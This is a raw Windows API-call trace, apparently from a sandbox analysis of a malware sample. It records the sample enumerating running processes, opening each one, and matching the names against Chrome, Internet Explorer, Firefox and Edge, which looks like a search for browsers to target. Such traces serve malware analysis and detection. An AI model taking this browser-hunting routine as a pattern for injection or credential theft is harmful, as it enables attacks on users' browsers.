	[0247.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.772] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.772] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0247.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.772] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.772] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0247.773] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x99b8
	[0247.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.773] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0247.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.774] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.774] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0247.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.774] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.774] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.775] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x99bc
	[0247.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.776] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.776] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.776] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.777] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.777] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.778] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x99c0
	[0247.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.778] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.778] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.778] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.779] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.779] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.780] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x99c4
	[0247.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.780] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.780] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.781] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.781] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.781] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.782] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x99c8
	[0247.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.782] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.783] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.783] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.783] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.784] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.784] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x99cc
	[0247.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.785] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.785] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.785] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.786] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.786] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.787] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x99d0
	[0247.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.787] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.787] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.787] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.788] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.788] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.789] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x99d4
	[0247.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.789] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.789] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.790] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.790] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.790] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0247.792] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x99d8
	[0247.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.792] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0247.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.793] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.793] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0247.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.793] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.794] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.794] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x99dc
	[0247.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.795] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.795] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.795] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.796] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.796] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0247.797] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x99e0
	[0247.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.797] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.797] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.797] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.798] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.798] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0247.799] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x99e4
	[0247.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.799] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0247.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.799] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.800] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0247.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.800] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.800] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.801] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x99e8
	[0247.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.801] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.802] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.802] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.802] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.803] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0247.803] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x99ec
	[0247.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.804] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0247.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.804] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.804] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0247.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.805] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.805] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0247.806] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x99f0
	[0247.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.806] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0247.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.806] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.807] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0247.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.808] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.808] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0247.808] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x99f4
	[0247.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.809] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0247.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.809] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.809] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0247.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.810] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.810] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0247.811] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x99f8
	[0247.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.811] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0247.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.811] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.812] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0247.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.812] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.813] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0247.813] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0247.813] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0247.814] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x99fc
	[0247.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.814] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0247.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.815] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.816] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0247.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.816] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.817] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0247.818] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x9a00
	[0247.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.818] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0247.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.819] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.819] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0247.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.820] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.820] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0247.821] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x9a04
	[0247.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.821] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0247.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.821] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.822] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0247.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.823] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.823] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0247.824] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x9a08
	[0247.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.824] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0247.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.825] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.825] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0247.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.826] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.826] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0247.827] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x9a0c
	[0247.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.827] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0247.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.828] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.829] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0247.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.829] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.830] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0247.831] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x9a10
	[0247.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.831] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0247.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.832] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.832] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0247.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.832] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.832] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0247.833] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x9a14
	[0247.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.834] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0247.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.834] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.835] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0247.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
